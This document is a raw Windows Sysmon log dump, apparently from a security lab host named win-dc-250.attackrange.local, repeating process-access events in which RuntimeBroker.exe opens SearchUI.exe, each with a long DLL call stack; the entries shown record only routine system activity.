13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 